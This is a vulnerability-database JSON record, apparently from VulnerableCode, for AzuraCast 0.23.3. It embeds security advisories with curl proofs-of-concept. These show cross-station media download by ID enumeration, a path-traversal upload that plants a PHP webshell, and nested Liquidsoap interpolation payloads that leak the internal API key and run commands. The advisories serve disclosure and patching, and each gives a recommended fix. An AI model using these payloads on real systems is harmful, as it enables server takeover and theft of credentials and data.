{"url":"http://public2.vulnerablecode.io/api/packages/514969?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.3","type":"composer","namespace":"azuracast","name":"azuracast","version":"0.23.3","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"0.23.6","latest_non_vulnerable_version":"0.23.6","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/94492?format=json","vulnerability_id":"VCID-8gy8-7nj2-z3hq","summary":"AzuraCast has Missing Permissions Check on Media File Download, Allowing Cross-Station Data Exfiltration\n## Summary\n\nThe `GET /api/station/{station_id}/file/{id}/play` endpoint, handled by `PlayAction`, is missing the `Middleware\\Permissions` check that protects all sibling routes in the same `/file/{id}` route group. Any authenticated user can download media files from any station, regardless of whether they have permissions on that station. In multi-tenant deployments, this enables cross-station media exfiltration.\n\n## Details\n\nIn `backend/config/routes/api_station.php`, the `/file/{id}` route group (lines 407-429) defines four endpoints:\n\n```php\n// Line 407-429\n$group->group(\n '/file/{id}',\n function (RouteCollectorProxy $group) {\n // GET /file/{id} — has Permissions check ✓\n $group->get('', ...)->add(new Middleware\\Permissions(StationPermissions::Media, true));\n\n // PUT /file/{id} — has Permissions check ✓\n $group->put('', ...)->add(new Middleware\\Permissions(StationPermissions::Media, true));\n\n // DELETE /file/{id} — has Permissions check ✓\n $group->delete('', ...)->add(new Middleware\\Permissions(StationPermissions::DeleteMedia, true));\n\n // GET /file/{id}/play — NO Permissions check ✗\n $group->get('/play', Controller\\Api\\Stations\\Files\\PlayAction::class)\n ->setName('api:stations:files:play');\n }\n);\n```\n\nThe middleware chain for the `/play` endpoint is: `GetStation → RequireStation → RequireLogin → StationSupportsFeature(Media) → PlayAction`. The `RequireLogin` middleware (`backend/src/Middleware/RequireLogin.php`) only verifies a valid session/API key exists — it does not check station-level permissions.\n\nThe controller at `backend/src/Controller/Api/Stations/Files/PlayAction.php:84` calls `$this->mediaRepo->requireForStation($id, $station)`, which verifies the media belongs to the station but performs no authorization check. The `findForStation` method (`StationMediaRepository.php:46-66`) accepts both auto-increment integer IDs and unique IDs, making enumeration trivial via sequential integers.\n\nThis is notably similar to the regression fixed in commit `7fbc7dd` (2026-02-26), which restored a missing group-level `Permissions` middleware on the adjacent `/files` group. The `/play` route was missed in that fix.\n\n## PoC\n\n```bash\n# Step 1: Create two stations (Station A and Station B) in a multi-tenant AzuraCast instance.\n# Upload media files to Station B.\n\n# Step 2: Create a user with permissions ONLY on Station A. Generate an API key for this user.\nAPI_KEY=\"user-with-only-station-a-access\"\n\n# Step 3: Enumerate and download media from Station B (station_id=2) using sequential IDs\n# This should return 403 Forbidden, but instead returns the file content\ncurl -H \"X-API-Key: $API_KEY\" https://target/api/station/2/file/1/play -o stolen1.mp3\n# HTTP 200 OK — file downloaded successfully\n\ncurl -H \"X-API-Key: $API_KEY\" https://target/api/station/2/file/2/play -o stolen2.mp3\n# HTTP 200 OK — file downloaded successfully\n\n# Step 4: Verify the same user is correctly blocked on other endpoints in the same group\ncurl -H \"X-API-Key: $API_KEY\" https://target/api/station/2/file/1\n# HTTP 403 Forbidden — permission check works here\n```\n\n## Impact\n\n- Any authenticated user can download the full media library of any station in the instance, regardless of their assigned permissions.\n- In multi-tenant deployments (e.g., hosting providers running multiple radio stations), a user of Station A can exfiltrate all copyrighted audio content from Station B.\n- Media IDs use auto-increment integers (`HasAutoIncrementId` trait on `StationMedia`), enabling trivial enumeration of all media files.\n- The confidentiality impact is High: full media file contents (MP3, FLAC, etc.) are exposed.\n\n## Recommended Fix\n\nAdd the `Permissions` middleware to the `/play` route, matching the pattern used by the adjacent routes:\n\n```php\n// backend/config/routes/api_station.php, line 426-427\n// Before:\n$group->get('/play', Controller\\Api\\Stations\\Files\\PlayAction::class)\n ->setName('api:stations:files:play');\n\n// After:\n$group->get('/play', Controller\\Api\\Stations\\Files\\PlayAction::class)\n ->setName('api:stations:files:play')\n ->add(new Middleware\\Permissions(StationPermissions::Media, true));\n```","references":[{"reference_url":"https://github.com/AzuraCast/AzuraCast","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/ba92dc3f0ea15a9c0ba0f4557d99a9a26004108f","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/commit/ba92dc3f0ea15a9c0ba0f4557d99a9a26004108f"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-qff7-q5fm-8p76","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-qff7-q5fm-8p76"},{"reference_url":"https://github.com/advisories/GHSA-qff7-q5fm-8p76","reference_id":"GHSA-qff7-q5fm-8p76","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qff7-q5fm-8p76"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114772?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.6"}],"aliases":["GHSA-qff7-q5fm-8p76"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8gy8-7nj2-z3hq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95346?format=json","vulnerability_id":"VCID-cerk-yd9a-2qf9","summary":"AzuraCast has Path Traversal in `currentDirectory` Parameter that Enables Remote Code Execution via Media Upload\n## Summary\n\nThe `currentDirectory` request parameter in the Flow.js media upload endpoint (`POST /api/station/{station_id}/files/upload`) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root.\n\n## Details\n\nIn `backend/src/Controller/Api/Stations/Files/FlowUploadAction.php`, the `currentDirectory` parameter is read directly from user input at line 79 and prepended to the sanitized filename at line 83:\n\n```php\n// FlowUploadAction.php:79-84\n$currentDir = Types::string($request->getParam('currentDirectory'));\n\n$destPath = $flowResponse->getClientFullPath();\nif (!empty($currentDir)) {\n $destPath = $currentDir . '/' . $destPath;\n}\n```\n\nWhile `$flowResponse->getClientFullPath()` is sanitized via `UploadedFile::filterClientPath()` (which strips `..` segments), the `$currentDir` value is prepended **after** this sanitization, reintroducing traversal capability.\n\nThis `$destPath` is passed to `MediaProcessor::processAndUpload()` at line 95-98. The critical issue is in the `finally` block at `backend/src/Media/MediaProcessor.php:114-117`:\n\n```php\n// MediaProcessor.php:75-117\ntry {\n if (MimeType::isFileProcessable($localPath)) {\n // ... process media ...\n return $record;\n }\n // ...\n throw CannotProcessMediaException::forPath($path, 'File type cannot be processed.');\n} catch (CannotProcessMediaException $e) {\n $this->unprocessableMediaRepo->setForPath($storageLocation, $path, $e->getMessage());\n throw $e;\n} finally {\n $fs->uploadAndDeleteOriginal($localPath, $path); // ALWAYS executes\n}\n```\n\nThe `finally` block writes the file to the traversed path **regardless** of whether the file passes MIME type validation. A `.php` file triggers `CannotProcessMediaException`, but the `finally` block still copies it to the destination before the exception propagates.\n\nFor local storage (the default), `LocalFilesystem::upload()` at `backend/src/Flysystem/LocalFilesystem.php:45-57` resolves the path via `getLocalPath()`:\n\n```php\n// LocalFilesystem.php:45-57\npublic function upload(string $localPath, string $to): void\n{\n $destPath = $this->getLocalPath($to); // PathPrefixer::prefixPath() — simple concatenation\n $this->ensureDirectoryExists(dirname($destPath), ...);\n copy($localPath, $destPath); // OS resolves ../\n}\n```\n\n`getLocalPath()` delegates to `PathPrefixer::prefixPath()` (League Flysystem), which performs simple string concatenation without normalization. This **bypasses** the `WhitespacePathNormalizer` that would catch traversal if the path went through the standard `Filesystem::write()`/`writeStream()` methods. The OS-level `copy()` then resolves `../` sequences, writing outside the media root.\n\nNote: `RemoteFilesystem::upload()` uses `$this->writeStream()` which DOES go through the normalizer, so S3/remote backends are not affected. Only local storage (the default configuration) is vulnerable.\n\nThe route at `backend/config/routes/api_station.php:399-405` requires `StationPermissions::Media` — a permission granted to DJs and station managers, not only admins.\n\n## PoC\n\nAssuming AzuraCast is running locally with a station (ID 1) using local filesystem storage and the attacker has a valid API key with Media permissions:\n\n**Step 1: Upload a PHP webshell via path traversal**\n\n```bash\ncurl -X POST \"http://localhost/api/station/1/files/upload\" \\\n -H \"Authorization: Bearer \" \\\n -F \"flowTotalChunks=1\" \\\n -F \"flowChunkNumber=1\" \\\n -F \"flowCurrentChunkSize=44\" \\\n -F \"flowTotalSize=44\" \\\n -F \"flowIdentifier=abc123\" \\\n -F \"flowFilename=shell.php\" \\\n -F \"currentDirectory=../../../../../var/azuracast/www/public\" \\\n -F \"file_data=@shell.php\"\n```\n\nWhere `shell.php` contains:\n```php\n\n```\n\nExpected response: An error JSON (because `.php` is not a processable media type), but the file has already been written by the `finally` block.\n\n**Step 2: Execute commands via the webshell**\n\n```bash\ncurl \"http://localhost/shell.php?cmd=id\"\n```\n\nExpected output:\n```\nuid=1000(azuracast) gid=1000(azuracast) groups=1000(azuracast)\n```\n\n## Impact\n\n- **Remote Code Execution**: An authenticated user with DJ or station manager privileges can write arbitrary PHP files to the web root and execute arbitrary system commands as the AzuraCast application user.\n- **Full Server Compromise**: The attacker can read configuration files (database credentials, API keys), access all station data, modify application code, and potentially escalate to root depending on system configuration.\n- **Privilege Escalation**: A DJ-level user (lowest privileged role with media access) can achieve the equivalent of full system administrator access.\n- **Data Exfiltration**: All station data, user credentials, and application secrets become accessible.\n\n## Recommended Fix\n\nSanitize `currentDirectory` in `FlowUploadAction.php` using the same `filterClientPath()` method used for filenames:\n\n```php\n// FlowUploadAction.php — replace line 79:\n$currentDir = Types::string($request->getParam('currentDirectory'));\n\n// With:\n$currentDir = UploadedFile::filterClientPath(\n Types::string($request->getParam('currentDirectory'))\n);\n```\n\nAdditionally, harden `LocalFilesystem::upload()` to normalize paths before use:\n\n```php\n// LocalFilesystem.php — add path normalization in upload():\npublic function upload(string $localPath, string $to): void\n{\n $normalizer = new WhitespacePathNormalizer();\n $to = $normalizer->normalizePath($to); // Throws PathTraversalDetected on ../\n\n $destPath = $this->getLocalPath($to);\n $this->ensureDirectoryExists(\n dirname($destPath),\n $this->visibilityConverter->defaultForDirectories()\n );\n\n if (!@copy($localPath, $destPath)) {\n throw UnableToCopyFile::fromLocationTo($localPath, $destPath);\n }\n}\n```\n\nAlso sanitize `flowIdentifier` in `Flow.php:67` to prevent secondary traversal in chunk directory creation.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42605","reference_id":"","reference_type":"","scores":[{"value":"0.00433","scoring_system":"epss","scoring_elements":"0.63074","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00433","scoring_system":"epss","scoring_elements":"0.63091","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00433","scoring_system":"epss","scoring_elements":"0.63087","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00433","scoring_system":"epss","scoring_elements":"0.63097","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00433","scoring_system":"epss","scoring_elements":"0.63089","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42605"},{"reference_url":"https://github.com/AzuraCast/AzuraCast","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T14:51:59Z/"}],"url":"https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T14:51:59Z/"}],"url":"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-11T14:51:59Z/"}],"url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42605","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42605"},{"reference_url":"https://github.com/advisories/GHSA-vp2f-cqqp-478j","reference_id":"GHSA-vp2f-cqqp-478j","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vp2f-cqqp-478j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114772?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.6"}],"aliases":["CVE-2026-42605","GHSA-vp2f-cqqp-478j"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-cerk-yd9a-2qf9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50782?format=json","vulnerability_id":"VCID-fhy8-psca-6qae","summary":"AzuraCast: RCE via Liquidsoap string interpolation injection in station metadata and playlist URLs\nAzuraCast's `ConfigWriter::cleanUpString()` method fails to sanitize Liquidsoap string interpolation sequences (`#{...}`), allowing authenticated users with `StationPermissions::Media` or `StationPermissions::Profile` permissions to inject arbitrary Liquidsoap code into the generated configuration file. When the station is restarted and Liquidsoap parses the config, `#{...}` expressions are evaluated, enabling arbitrary command execution via Liquidsoap's `process.run()` function.","references":[{"reference_url":"https://github.com/AzuraCast/AzuraCast","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/d04b5c55ce0d867bcb87f49f7082bf8edbcd360c","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/commit/d04b5c55ce0d867bcb87f49f7082bf8edbcd360c"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/ff49ef4d0fa571a3661abff6d0a9546ba3ed5df5","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/commit/ff49ef4d0fa571a3661abff6d0a9546ba3ed5df5"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.4"},{"reference_url":"https://github.com/advisories/GHSA-93fx-5qgc-wr38","reference_id":"GHSA-93fx-5qgc-wr38","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-93fx-5qgc-wr38"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-93fx-5qgc-wr38","reference_id":"GHSA-93fx-5qgc-wr38","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-93fx-5qgc-wr38"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74573?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8gy8-7nj2-z3hq"},{"vulnerability":"VCID-cerk-yd9a-2qf9"},{"vulnerability":"VCID-j6hb-ctmg-9bh4"},{"vulnerability":"VCID-rf68-9kxx-zff5"},{"vulnerability":"VCID-xmx3-ssn9-e7gz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.4"}],"aliases":["GHSA-93fx-5qgc-wr38"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fhy8-psca-6qae"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/95190?format=json","vulnerability_id":"VCID-j6hb-ctmg-9bh4","summary":"AzuraCast Vulnerable to Liquidsoap Code Injection via Incomplete cleanUpString-to-toRawString Migration in Remote Relay Password Field\n## Summary\n\nThe `cleanUpString()` method in `ConfigWriter.php` uses an ungreedy regex to strip Liquidsoap string interpolation patterns (`#{...}`) from user input. This regex can be bypassed via nested interpolation syntax (`#{#{EXPR}}`), allowing injection of arbitrary Liquidsoap code. Commit `ff49ef4` migrated most user-controlled fields to the safe `toRawString()` method but left the remote relay password field using the vulnerable `cleanUpString()`. A user with the `RemoteRelays` station permission can achieve arbitrary code execution in the Liquidsoap process, leak internal API keys, or disrupt station operation.\n\n## Details\n\n### The Vulnerable Sanitizer\n\n`cleanUpString()` at `backend/src/Radio/Backend/Liquidsoap/ConfigWriter.php:1349-1367`:\n\n```php\npublic static function cleanUpString(?string $string): string\n{\n $string = str_replace(['\"', \"\\n\", \"\\r\"], ['\\'', '', ''], $string ?? '');\n\n // Remove strings that are interpolated\n $string = preg_replace(\n '/#{(.*)}/U', // Ungreedy: matches minimum chars to first }\n '$1',\n $string\n );\n\n $string = preg_replace(\n '/\\$\\((.*)\\)/U',\n '$1',\n $string ?? ''\n );\n\n return $string ?? '';\n}\n```\n\nThe `/U` (ungreedy) flag causes `.*` to match the **minimum** characters until the first `}`. With nested input `#{#{EXPR}}`:\n\n1. Regex finds `#{` at position 0\n2. Ungreedy `.*` matches `#{EXPR` (stops at the **first** `}`)\n3. Full match consumed: `#{#{EXPR}` — replacement with capture group `$1` yields: `#{EXPR`\n4. The trailing `}` is appended by the regex engine (it was outside the match)\n5. **Final result: `#{EXPR}`** — a valid Liquidsoap string interpolation expression\n\n### The Incomplete Patch\n\nCommit `ff49ef4` (\"Use raw strings for user-input strings to avoid interpolation\", 2026-03-06) correctly migrated host, username, mount, name, description, genre, and URL fields to `toRawString()`. However, the password field was left using `cleanUpString()`:\n\n`ConfigWriter.php:1208-1215`:\n```php\n$password = self::cleanUpString($source->password); // Still vulnerable\n\n$adapterType = $source->adapterType;\nif (FrontendAdapters::Shoutcast === $adapterType) {\n $password .= ':#' . $id;\n}\n\n$outputParams[] = 'password = \"' . $password . '\"'; // Double-quoted = interpolated\n```\n\nThe password is embedded in a Liquidsoap **double-quoted string**, which evaluates `#{...}` interpolation expressions.\n\n### Why toRawString() Is Safe\n\n`toRawString()` uses Liquidsoap raw string delimiters (`{str_xxxxx|...|str_xxxxx}`) which **do not perform interpolation**, making them immune to this attack class.\n\n### The Input Path\n\n1. Attacker sends `PUT /api/station/{station_id}/remote/{id}` with `source_password` containing the nested payload\n2. Entity setter truncates to 100 chars via `mb_substr` (payloads fit within this limit)\n3. No validation on password content\n4. On station config regeneration, `ConfigWriter::getOutputString()` calls `cleanUpString()` on the password\n5. Bypass produces valid interpolation, embedded in double-quoted Liquidsoap string\n6. Liquidsoap evaluates the interpolation when loading the config\n\n## PoC\n\n### Step 1: API Key Disclosure (38 chars)\n\n```bash\n# Set malicious password on an existing remote relay\ncurl -X PUT \"http://azuracast.local/api/station/1/remote/1\" \\\n -H \"X-API-Key: $API_KEY\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"source_password\": \"#{#{settings.azuracast.api_key()}}\"}'\n```\n\nAfter `cleanUpString()` processing, the password becomes `#{settings.azuracast.api_key()}`.\n\nWhen Liquidsoap loads the config, the generated line:\n```\npassword = \"#{settings.azuracast.api_key()}\"\n```\nevaluates to the internal API key value, which is then sent as the password to the remote relay server — observable by the attacker if they control the relay endpoint.\n\n### Step 2: Remote Code Execution (54 chars)\n\n```bash\n# RCE payload using string.char() to bypass quote filtering\ncurl -X PUT \"http://azuracast.local/api/station/1/remote/1\" \\\n -H \"X-API-Key: $API_KEY\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"source_password\": \"#{#{process.run(string.char(105)^string.char(100))}}\"}'\n```\n\nAfter processing: `#{process.run(string.char(105)^string.char(100))}` → executes `id` command.\n\n`string.char()` and the `^` concatenation operator are used to build the command string without double quotes (which `cleanUpString` replaces with single quotes, and Liquidsoap doesn't support single-quoted strings).\n\n### Step 3: Trigger config regeneration\n\nRestart the station or modify any station setting to force Liquidsoap config regeneration. The payload executes when Liquidsoap loads the new config.\n\nThe same bypass works with `$($(EXPR))` via the second regex `/\\$\\((.*)\\)/U`.\n\n## Impact\n\n- **Arbitrary code execution** within the Liquidsoap process container via `process.run()`\n- **Internal API key disclosure** via `settings.azuracast.api_key()`, granting the attacker full internal API access to the station\n- **File read/write** within the Liquidsoap container via Liquidsoap's file operations\n- **Station disruption** — malicious config can crash the Liquidsoap process\n- **Low privilege bar** — requires only the `RemoteRelays` station permission, not global admin\n\n## Recommended Fix\n\nReplace `cleanUpString()` with `toRawString()` for the password field, consistent with the fix applied to all other fields in commit `ff49ef4`. The Shoutcast suffix append needs adjustment to work with raw strings:\n\n```php\n// Before (vulnerable):\n$password = self::cleanUpString($source->password);\n$adapterType = $source->adapterType;\nif (FrontendAdapters::Shoutcast === $adapterType) {\n $password .= ':#' . $id;\n}\n$outputParams[] = 'password = \"' . $password . '\"';\n\n// After (safe):\n$password = $source->password ?? '';\n$adapterType = $source->adapterType;\nif (FrontendAdapters::Shoutcast === $adapterType) {\n $password .= ':#' . $id;\n}\n$outputParams[] = 'password = ' . self::toRawString($password);\n```\n\nThis uses the raw string delimiter which prevents all interpolation, matching the approach already used for host, username, mount, and all other user-controlled fields.\n\nAdditionally, consider removing `cleanUpString()` entirely or marking it as deprecated, since `toRawString()` is the correct approach for all Liquidsoap string values. Any remaining callers should be migrated.","references":[{"reference_url":"https://github.com/AzuraCast/AzuraCast","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/commit/d6b8422fc2c36269df9d1adec89dfbba58828915","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/commit/d6b8422fc2c36269df9d1adec89dfbba58828915"},{"reference_url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-q4ph-8x8g-95f8","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-q4ph-8x8g-95f8"},{"reference_url":"https://github.com/advisories/GHSA-q4ph-8x8g-95f8","reference_id":"GHSA-q4ph-8x8g-95f8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q4ph-8x8g-95f8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/114772?format=json","purl":"pkg:composer/azuracast/azuracast@0.23.6","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/azuracast/azuracast@0.23.6"}],"aliases":["GHSA-q4ph-8x8g-95f8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-j6hb-ctmg-9bh4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/92169?format=json","vulnerability_id":"VCID-rf68-9kxx-zff5","summary":"AzuraCast's Missing RequireInternalConnection on Liquidsoap API Allows Low-Privilege Metadata Injection and Broadcast Disruption\n## Summary\n\nThe `/api/internal/{station_id}/liquidsoap/{action}` endpoint is accessible from the public web interface because it lacks the `RequireInternalConnection` middleware that protects other internal endpoints (`/sftp-auth`, `/sftp-event`). Combined with a logic flaw where the `$asAutoDj` flag is set based on the *presence* of the `X-Liquidsoap-Api-Key` header rather than its *validated value*, any user with the basic `View` station permission can invoke privileged Liquidsoap commands — injecting arbitrary now-playing metadata visible to all listeners, disrupting live broadcast tracking, and disclosing absolute filesystem paths.\n\n## Details\n\n**Issue 1: Missing RequireInternalConnection middleware**\n\nIn `backend/config/routes/api_internal.php`, the liquidsoap route group (lines 17-21) lacks the `RequireInternalConnection` middleware:\n\n```php\n// Lines 17-21 — NO RequireInternalConnection\n$group->map(\n ['GET', 'POST'],\n '/liquidsoap/{action}',\n Controller\\Api\\Internal\\LiquidsoapAction::class\n)->setName('api:internal:liquidsoap');\n```\n\nCompare with sftp endpoints that correctly apply it:\n\n```php\n// Lines 32-34 — HAS RequireInternalConnection\n$group->post('/sftp-auth', Controller\\Api\\Internal\\SftpAuthAction::class)\n ->setName('api:internal:sftp-auth')\n ->add(Middleware\\RequireInternalConnection::class);\n```\n\nThe nginx config (`util/docker/web/nginx/azuracast.conf.tmpl`) only sets the `IS_INTERNAL` FastCGI parameter on the internal port 6010 listener (line 44), not on the public-facing server block (ports 80/443). Without the middleware, the endpoint is fully accessible from the public internet.\n\n**Issue 2: `$asAutoDj` derived from header presence, not validated value**\n\nIn `backend/src/Controller/Api/Internal/LiquidsoapAction.php`:\n\n```php\n// Line 34 — checks header PRESENCE, not value\n$asAutoDj = $request->hasHeader('X-Liquidsoap-Api-Key');\n\n// Lines 38-44 — key value only checked when ACL FAILS\n$acl = $request->getAcl();\nif (!$acl->isAllowed(StationPermissions::View, $station->id)) {\n $authKey = $request->getHeaderLine('X-Liquidsoap-Api-Key');\n if (!$station->validateAdapterApiKey($authKey)) {\n throw new RuntimeException('Invalid API key.');\n }\n}\n```\n\nWhen a user authenticates via session/API key and has `StationPermissions::View`, the ACL check passes and the adapter API key is never validated. But `$asAutoDj` is already `true` from line 34 because the header is present (with any arbitrary 